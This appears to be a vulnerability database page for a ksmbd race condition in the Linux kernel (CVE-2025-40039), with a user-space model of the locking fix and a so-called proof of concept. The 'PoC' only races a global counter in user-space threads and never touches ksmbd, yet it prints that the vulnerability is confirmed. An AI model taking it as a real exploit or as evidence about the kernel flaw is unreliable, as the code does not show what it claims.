Security Vulnerability Report
CVE-2025-40039 CVSS 4.7 MEDIUM

CVE-2025-40039

Published: 2025-10-28 12:15:38
Last Modified: 2026-02-26 15:50:58
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ksmbd: Fix race condition in RPC handle list access

The 'sess->rpc_handle_list' XArray manages RPC handles within a ksmbd session. Access to this list is intended to be protected by 'sess->rpc_lock' (an rw_semaphore). However, the locking implementation was flawed, leading to potential race conditions.

In ksmbd_session_rpc_open(), the code incorrectly acquired only a read lock before calling xa_store() and xa_erase(). Since these operations modify the XArray structure, a write lock is required to ensure exclusive access and prevent data corruption from concurrent modifications.

Furthermore, ksmbd_session_rpc_method() accessed the list using xa_load() without holding any lock at all. This could lead to reading inconsistent data or a potential use-after-free if an entry is concurrently removed and the pointer is dereferenced.

Fix these issues by:
1. Using down_write() and up_write() in ksmbd_session_rpc_open() to ensure exclusive access during XArray modification, and ensuring the lock is correctly released on error paths.
2. Adding down_read() and up_read() in ksmbd_session_rpc_method() to safely protect the lookup.
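A user-space model of the locking discipline the fix describes, added here as an example (it is not kernel or ksmbd code): modifications take the lock exclusively and release it on the error path, while the lookup takes it shared and copies the value out before dropping it. The names session_init, rpc_open, rpc_method, rpc_close, MAX_HANDLES and the integer method tag are assumptions of the model; a fixed-size array stands in for the XArray and a pthread_rwlock_t for the rw_semaphore.

```c
/* Added example (not ksmbd code): user-space model of the fixed locking. A
 * fixed-size array stands in for the XArray, pthread_rwlock_t for the rw_semaphore. */
#define _POSIX_C_SOURCE 200809L
#include <pthread.h>
#include <stdlib.h>
#define MAX_HANDLES 64
struct rpc_handle { int method; };            /* constructed stand-in payload */
struct session {
    struct rpc_handle *list[MAX_HANDLES];     /* models sess->rpc_handle_list */
    pthread_rwlock_t lock;                    /* models sess->rpc_lock */
};
void session_init(struct session *s) {
    for (int i = 0; i < MAX_HANDLES; i++) s->list[i] = NULL;
    pthread_rwlock_init(&s->lock, NULL);
}
/* rpc_open() as fixed: modify only under the WRITE lock; release it on every path. */
int rpc_open(struct session *s, int method) {
    struct rpc_handle *h = malloc(sizeof *h);
    if (!h) return -1;
    h->method = method;
    pthread_rwlock_wrlock(&s->lock);                 /* down_write() */
    for (int i = 0; i < MAX_HANDLES; i++) {
        if (!s->list[i]) {
            s->list[i] = h;                          /* xa_store() */
            pthread_rwlock_unlock(&s->lock);         /* up_write() */
            return i;
        }
    }
    pthread_rwlock_unlock(&s->lock);                 /* up_write() on the error path */
    free(h);
    return -1;
}
/* rpc_method() as fixed: xa_load() under the READ lock, copying the value out
 * before dropping it so a concurrent erase cannot free the entry mid-dereference. */
int rpc_method(struct session *s, int id) {
    int method = -1;                                 /* -1: id is not live */
    pthread_rwlock_rdlock(&s->lock);                 /* down_read() */
    if (id >= 0 && id < MAX_HANDLES && s->list[id])
        method = s->list[id]->method;
    pthread_rwlock_unlock(&s->lock);                 /* up_read() */
    return method;
}
/* Closing: xa_erase() under the WRITE lock, free only after dropping it. */
void rpc_close(struct session *s, int id) {
    struct rpc_handle *h = NULL;
    pthread_rwlock_wrlock(&s->lock);
    if (id >= 0 && id < MAX_HANDLES) { h = s->list[id]; s->list[id] = NULL; }
    pthread_rwlock_unlock(&s->lock);
    free(h);
}
```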

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.15.145 up to, excluding, 5.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.1.71 up to, excluding, 6.2) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.3 up to, excluding, 6.6.123) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7 up to, excluding, 6.12.53) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 up to, excluding, 6.17.3) - VULNERABLE
Linux Kernel ksmbd (to determine the affected versions, check the patches for the specific kernel version)
Related kernel fix commit: 305853cce379407090a73b38c5de5ba748893aee
Related kernel fix commit: 5cc679ba0f4505936124cd4179ba66bb0a4bd9f3
Related kernel fix commit: 69674b029002b1d90b655f014bdf64f404efa54d
Related kernel fix commit: 6b615a8fb3af0baf8126cde3d4fee97d57222ffc
Related kernel fix commit: 6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-40039 PoC - Race Condition in ksmbd RPC Handle List
// This PoC demonstrates the race condition by spawning multiple threads
// that concurrently call RPC operations to trigger the race condition
#include <stdio.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>

// Simulated ksmbd structures
typedef struct {
    void *rpc_handle_list; // XArray structure
    void *rpc_lock;        // rw_semaphore
} ksmbd_session_t;

ksmbd_session_t global_session;
volatile int shared_counter = 0;
volatile int race_triggered = 0;

// Simulated vulnerable function: ksmbd_session_rpc_open
void* ksmbd_session_rpc_open(void* arg) {
    int thread_id = *(int*)arg;
    // VULNERABLE: Using read lock for write operation (xa_store/xa_erase)
    // Should use write lock (down_write) for modifying XArray
    // down_read(&session->rpc_lock); // Incorrect lock type
    for (int i = 0; i < 1000; i++) {
        // Simulate xa_store() operation
        shared_counter++;
        // Simulate xa_erase() operation
        shared_counter--;
        // Check for race condition indicators
        if (shared_counter != 0) {
            race_triggered = 1;
            printf("[Thread %d] Race condition detected! counter=%d\n", thread_id, shared_counter);
        }
    }
    // up_read(&session->rpc_lock);
    return NULL;
}

// Simulated vulnerable function: ksmbd_session_rpc_method
void* ksmbd_session_rpc_method(void* arg) {
    int thread_id = *(int*)arg;
    // VULNERABLE: No lock at all when accessing XArray with xa_load()
    // Should use read lock (down_read) for read-only access
    for (int i = 0; i < 1000; i++) {
        // Simulate xa_load() without lock
        int temp = shared_counter;
        // Simulate use-after-free scenario
        if (temp < 0) {
            printf("[Thread %d] Potential use-after-free detected!\n", thread_id);
        }
    }
    return NULL;
}

int main() {
    pthread_t threads[8];
    int thread_ids[8];
    printf("CVE-2025-40039 PoC - ksmbd RPC Handle Race Condition\n");
    printf("=====================================================\n\n");
    // Create threads to trigger race condition
    for (int i = 0; i < 4; i++) {
        thread_ids[i] = i;
        pthread_create(&threads[i], NULL, ksmbd_session_rpc_open, &thread_ids[i]);
    }
    for (int i = 4; i < 8; i++) {
        thread_ids[i] = i;
        pthread_create(&threads[i], NULL, ksmbd_session_rpc_method, &thread_ids[i]);
    }
    // Wait for all threads
    for (int i = 0; i < 8; i++) {
        pthread_join(threads[i], NULL);
    }
    printf("\nFinal counter value: %d\n", shared_counter);
    printf("Race condition triggered: %s\n", race_triggered ? "YES" : "NO");
    if (race_triggered) {
        printf("\n[!] Vulnerability confirmed: Race condition in ksmbd RPC handle access\n");
        return 1;
    }
    return 0;
}
// Compilation: gcc -pthread -o cve_poc cve_poc.c
// Note: This is a simplified PoC for demonstration purposes.
// Real exploitation requires triggering ksmbd's SMB/RPC processing paths.

References

https://git.kernel.org/stable/c/305853cce379407090a73b38c5de5ba748893aee (Patch)
https://git.kernel.org/stable/c/5cc679ba0f4505936124cd4179ba66bb0a4bd9f3 (Patch)
https://git.kernel.org/stable/c/69674b029002b1d90b655f014bdf64f404efa54d (Patch)
https://git.kernel.org/stable/c/6b615a8fb3af0baf8126cde3d4fee97d57222ffc (Patch)
https://git.kernel.org/stable/c/6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40039", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-28T12:15:37.847", "lastModified": "2026-02-26T15:50:57.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix race condition in RPC handle list access\n\nThe 'sess->rpc_handle_list' XArray manages RPC handles within a ksmbd\nsession. Access to this list is intended to be protected by\n'sess->rpc_lock' (an rw_semaphore). However, the locking implementation was\nflawed, leading to potential race conditions.\n\nIn ksmbd_session_rpc_open(), the code incorrectly acquired only a read lock\nbefore calling xa_store() and xa_erase(). Since these operations modify\nthe XArray structure, a write lock is required to ensure exclusive access\nand prevent data corruption from concurrent modifications.\n\nFurthermore, ksmbd_session_rpc_method() accessed the list using xa_load()\nwithout holding any lock at all. This could lead to reading inconsistent\ndata or a potential use-after-free if an entry is concurrently removed and\nthe pointer is dereferenced.\n\nFix these issues by:\n1. Using down_write() and up_write() in ksmbd_session_rpc_open()\n to ensure exclusive access during XArray modification, and ensuring\n the lock is correctly released on error paths.\n2. 
Adding down_read() and up_read() in ksmbd_session_rpc_method()\n to safely protect the lookup."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.145", "versionEndExcluding": "5.16", "matchCriteriaId": "B98C9201-BF17-4E2C-84FF-75EE2AA94DC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.71", "versionEndExcluding": "6.2", "matchCriteriaId": "163E72B5-0F5D-49E2-AAEA-F11E02D730AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.6.123", "matchCriteriaId": "F522E23F-2E27-4FDC-A9A5-FE6B600E1D7D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.53", "matchCriteriaId": "A9028AC3-C3E8-4D5D-9235-DE8859551F7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.17.3", "matchCriteriaId": "F55A160F-1578-4C10-ABCB-F90B7E146ED8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/305853cce379407090a73b38c5de5ba748893aee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": 
["Patch"]}, {"url": "https://git.kernel.org/stable/c/5cc679ba0f4505936124cd4179ba66bb0a4bd9f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69674b029002b1d90b655f014bdf64f404efa54d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b615a8fb3af0baf8126cde3d4fee97d57222ffc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}